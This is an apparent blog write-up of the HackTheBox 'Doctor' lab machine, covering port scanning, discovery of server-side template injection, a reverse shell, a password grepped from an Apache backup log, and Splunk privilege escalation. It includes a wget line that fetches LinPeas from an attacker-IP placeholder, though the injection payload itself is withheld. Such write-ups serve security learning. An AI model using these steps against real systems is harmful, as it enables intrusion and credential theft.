Doctor Write-Up (HackTheBox)

An easy Linux machine created by egotisticalSW

About this machine

The first thing I did, was to add the machine IP to the /etc/hosts file.

nano /etc/hosts

Then, I tried to get a first look on the website.

http://doctor.htb:80/

I saw there was an email on the home page : ‘info@doctors.htb’.

So, I changed the host name in the /etc/hosts file. (doctor.htb => doctors.htb)

nano /etc/hosts

Enumeration

I started this phase with a port scan. I used Nmap, to learn more about the host and the technologies which are running on ports.

nmap -sC -sV <IP> -p-
  • -sC : Equivalent to — script=default
  • -sV : Probe open ports to determine service/version info
  • -p- : Scan all ports

There were 3 open ports :

  • SSH on port 22.
  • A web server which runs Apache httpd 2.4.41Werkzeug 1.0.1Python 3.8.2 on port 80.
  • Another web server (SSL) which runs Splunk on port 8089. We can see a robots.txt too.

I tried to get a second look to the website, with the new host name. And… I found a login page.

I saw it was possible to create an account. I first tried to create an admin account without success.

After creating a “test” account, I saw there was a time limit for my account.

Time limit

Twenty minutes of time limit.

Here was the /home page when I was logged in.

Then, I displayed the source code…

Source code

Something was interesting here.

“Archive still under beta testing”

So I opened up gobuster to find if there was interesting pages. And at the same time, checked this /archive page.

gobuster dir -u <URL> -w <WORDLIST> -x <FILES EXTENTIONS>
  • dir : Enumerate directories
  • -u : The URL to enumerate
  • -w : The word-list to use
  • -x : The extensions of the files you want to find

Accessing to /archive, gave me a blank page…

After being stuck for some minutes, I tried to send a message with HTML tags in it.

Here was the result… Nothing good, there was a blank page which is the source code :

First attempt injecting HTML template

Server-Side Template Injection

I tried another thing, just by modifying my first attempt.

Modified first attempt

And then, I got a result..

That made me think about a Server-Side Template injection. (SSTI)

According to Port Swigger, here is a little explanation about what it is :

“Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.

Template engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server. As the name suggests, server-side template injection payloads are delivered and evaluated server-side, potentially making them much more dangerous than a typical client-side template injection.”

SSTI Mind Map (https://twitter.com/0xklaue/status/1274587855881244672?s=20)

After some research about this vulnerability, I learnt how to try if the app was vulnerable to it.

So, I tried it…

SSTI attempt

IT WORKED PERFECTLY !

Results for SSTI

I began to look for an exploit and found this :

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Server Side Template Injection/README.md

For obvious reasons, I will not show you how I exploited it, but I think I gave you all you need to know.

Exploit

After exploiting this vulnerability, I was able to spawn a reverse shell.

Reverse shell opened as “web”

I looked for the user.txt and found a user named shaun, which owns the user.txt. So I wasn’t able to read it.

The thing I tried after the initial foothold was to know if I could find an interesting backup file (A lot of theses files have passwords stored in them).

find / -type f -name *backup* 2>/dev/null
  • -type = the type of object you are looking for (file, directory…)
  • -name = the name of the object
Backup file

Then, I found an interesting one.

cat /var/log/apache2/backup

As this file contains a lot of data, I used the grep command to make my reading easier.

cat /var/log/apache2/backup | grep pass

And I found shaun’s password…

After being logged as shaun, and found the user.txt, I immediately tried to use LinPeas for the privilege escalation part.

Privilege Escalation

I opened a python server on my machine to transfer LinPeas to the victim machine.

(Attacker side) python3 -m http.server 8888
(Victim side) wget http://<Attacker-IP>:<PORT>/linpeas.sh

When LinPeas finished his work, I was not able to find a nice privilege escalation vector, but I found a user named Splunk.

After few research, I found SplunkWhisperer2. It’s a python script for local/remote privilege escalation.

I downloaded the script with git clone and used it on remote mode.

PWNED !!!

Thank you for reading this write-up, I hope it helped you.

--

--

--

Information Security

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Conscious (Un)coupling of VAS

{UPDATE} Brain Toss Hack Free Resources Generator

OverTheWire: Bandit Level 15

Hack The Box — Nineveh: Walkthrough (without Metasploit)

How to find the best antivirus software for windows

CRYPTOJACKING?

Automating DLL Hijack Discovery

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
kaarb0

kaarb0

Information Security

More from Medium

OSINT: Do I have to Capture The Flag? Pt2.

A building leaning out over a precipice. Someone built something that just about does the job but probably won’t stand up. Much like the simple OSINT CTF we’ll be building. Just a bit of fun really.

Zain CTF 2022 Writeups — squirrel Challenge

AD Homelab Upgraded

TryHackMe — Year of the Rabbit Write-Up